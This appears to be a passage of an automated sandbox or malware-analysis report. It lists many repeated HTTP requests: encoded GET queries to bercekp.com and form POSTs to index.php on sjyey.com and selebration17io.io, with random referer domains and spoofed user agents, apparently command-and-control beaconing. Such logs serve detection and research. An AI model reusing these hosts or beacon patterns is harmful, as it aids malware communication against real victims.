                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gniojjrdbkvkild.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: sjyey.com
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://owkwdtvjnkvrsfwd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://djbawpyhyvkpnev.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: sjyey.com
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rcwvrbbpbpj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gbwukmwvgrgsfaaf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: sjyey.com
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rtidvriqxmxrtbpy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ggvrtjlquqrnge.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: sjyey.com
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://saofaiqxfrhu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: selebration17io.io
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                      Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1Host: bercekp.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
